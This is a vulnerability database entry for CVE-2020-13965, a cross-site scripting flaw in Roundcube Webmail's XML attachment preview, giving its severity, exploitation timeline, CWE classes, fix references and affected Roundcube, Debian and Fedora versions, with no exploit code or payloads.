CVE-2020-13965
Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability
Severity Score
6.1
*CVSS v3.1
Exploit Likelihood
*EPSS
Affected Versions
*CPE
Public Exploits
2
*Multiple Sources
Exploited in Wild
Yes
*KEV
Decision
Attend
*SSVC
Descriptions
An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.
Se detectó un problema en Roundcube Webmail versiones anteriores a 1.3.12. Se presenta una vulnerabilidad de tipo XSS por medio de un archivo adjunto XML malicioso porque text/xml se encuentra entre los tipos permitidos para una vista previa
Roundcube Webmail contains a cross-site scripting (XSS) vulnerability that allows a remote attacker to manipulate data via a malicious XML attachment.
*Credits:
N/A
CVSS Scores
Attack Vector
Attack Complexity
Privileges Required
User Interaction
Scope
Confidentiality
Integrity
Availability
Attack Vector
Attack Complexity
Privileges Required
User Interaction
Scope
Confidentiality
Integrity
Availability
Attack Vector
Attack Complexity
Authentication
Confidentiality
Integrity
Availability
* Common Vulnerability Scoring System
SSVC
- Decision:Attend
Exploitation
Automatable
Tech. Impact
* Organization's Worst-case Scenario
Timeline
- 2020-06-09 CVE Reserved
- 2020-06-09 CVE Published
- 2024-04-13 First Exploit
- 2024-06-26 Exploited in Wild
- 2024-07-17 KEV Due Date
- 2024-08-04 CVE Updated
- 2024-10-03 EPSS Updated
CWE
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
CAPEC
References (10)
| URL | Tag | Source |
|---|---|---|
| https://github.com/roundcube/roundcubemail/releases/tag/1.3.12 | Release Notes | |
| https://github.com/roundcube/roundcubemail/releases/tag/1.4.5 | Release Notes |
| URL | Date | SRC |
|---|---|---|
| https://github.com/roundcube/roundcubemail/commit/884eb611627ef2bd5a2e20e02009ebb1eceecdc3 | 2024-07-03 | |
| https://github.com/roundcube/roundcubemail/compare/1.4.4...1.4.5 | 2024-07-03 |
Affected Vendors, Products, and Versions
| Vendor | Product | Version | Other | Status | ||||||
|---|---|---|---|---|---|---|---|---|---|---|
| Vendor | Product | Version | Other | Status | <-- --> | Vendor | Product | Version | Other | Status |
| Roundcube Search vendor "Roundcube" | Webmail Search vendor "Roundcube" for product "Webmail" | < 1.3.12 Search vendor "Roundcube" for product "Webmail" and version " < 1.3.12" | - |
Affected
| ||||||
| Roundcube Search vendor "Roundcube" | Webmail Search vendor "Roundcube" for product "Webmail" | >= 1.4.0 < 1.4.5 Search vendor "Roundcube" for product "Webmail" and version " >= 1.4.0 < 1.4.5" | - |
Affected
| ||||||
| Debian Search vendor "Debian" | Debian Linux Search vendor "Debian" for product "Debian Linux" | 9.0 Search vendor "Debian" for product "Debian Linux" and version "9.0" | - |
Affected
| ||||||
| Debian Search vendor "Debian" | Debian Linux Search vendor "Debian" for product "Debian Linux" | 10.0 Search vendor "Debian" for product "Debian Linux" and version "10.0" | - |
Affected
| ||||||
| Fedoraproject Search vendor "Fedoraproject" | Fedora Search vendor "Fedoraproject" for product "Fedora" | 31 Search vendor "Fedoraproject" for product "Fedora" and version "31" | - |
Affected
| ||||||
| Fedoraproject Search vendor "Fedoraproject" | Fedora Search vendor "Fedoraproject" for product "Fedora" | 32 Search vendor "Fedoraproject" for product "Fedora" and version "32" | - |
Affected
| ||||||